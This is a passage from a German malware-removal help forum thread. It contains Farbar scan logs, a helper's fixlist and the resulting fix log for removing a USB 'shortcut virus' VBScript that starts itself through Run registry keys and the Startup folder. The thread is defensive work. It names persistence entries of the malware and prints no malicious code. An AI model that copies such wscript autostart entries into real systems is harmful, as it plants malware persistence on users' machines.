(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
==================== Registry (Whitelisted) ==================
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
==================== Internet (Whitelisted) ====================
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]
==================== Services (Whitelisted) =================
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)
==================== Drivers (Whitelisted) ====================
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
==================== One Month Created Files and Folders ========
2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 23:36 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
==================== One Month Modified Files and Folders =======
2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:36 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 23:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-17 23:14 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 23:14 - 2013-04-16 19:13 - 01673821 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-17 08:28 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:33 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 05:32 - 2009-07-14 06:51 - 00088400 _____ () C:\Windows\setupact.log
2014-04-17 02:07 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-17 02:07 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-17 02:07 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\{04F28610-2CBA-4508-A95B-D654F15084A8}-34.0.1847.116_33.0.1750.154_chrome_updater.exe
==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
LastRegBack: 2014-03-24 00:49
==================== End Of Log ============================
|
|
18.04.2014, 17:01
| #10 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Erstmal haben wir alles runum gekillt Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
|
18.04.2014, 22:27
| #11 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs Habe alles gemacht, die .vbs kommt nach formatieren weiterhin auf dem Stick Fixlog.txt: Code:
ATTFilter Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-04-2014 01
Ran by Franz at 2014-04-18 23:14:09 Run:1
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
*****************
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Moved successfully.
Could not move "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" => Scheduled to move on reboot.
=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-04-18 23:16:01)<=
C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs => Is moved successfully.
==== End of Fixlog ====
|
|
19.04.2014, 12:38
| #12 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Frisches FRST log bitte.
__________________ gruß, schrauber Proud Member of UNITE and ASAP since 2009 Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM! |
|
20.04.2014, 04:23
| #13 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs FRST.txt: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 17-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 20-04-2014 05:20:46
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
